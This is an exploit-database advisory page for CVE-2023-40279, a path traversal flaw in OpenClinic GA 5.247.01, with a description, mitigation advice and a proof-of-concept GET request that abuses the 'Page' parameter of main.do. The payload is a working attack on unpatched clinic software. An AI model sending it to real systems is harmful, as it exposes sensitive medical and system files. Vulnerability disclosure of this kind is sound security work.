header-logo
Suggest Exploit
vendor:
OpenClinic
by:
V. B.
6.1
CVSS
HIGH
Path Traversal
22
CWE
Product Name: OpenClinic
Affected Version From: 5.247.01
Affected Version To: 5.247.01
Patch Exists: NO
Related CWE: CVE-2023-40279
CPE: a:openclinic_project:openclinic:5.247.01
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Windows 11
2023

OpenClinic GA 5.247.01 – Path Traversal Vulnerability (Authenticated)

An authenticated path traversal vulnerability was found in OpenClinic GA version 5.247.01. By manipulating the 'Page' parameter in a GET request to 'main.do', an attacker can navigate to arbitrary directories and retrieve or execute files. This can lead to unauthorized access to sensitive information or facilitate more severe attacks.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to restrict user-supplied input within the application's intended directory structure. Additionally, access controls should be enforced to limit access to sensitive files and directories.
Source

Exploit-DB raw data:

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)
Steps to Reproduce:

- Crafting the Malicious GET Request:

- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0

2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.

Navigation

Suggest Exploit

Services By CQR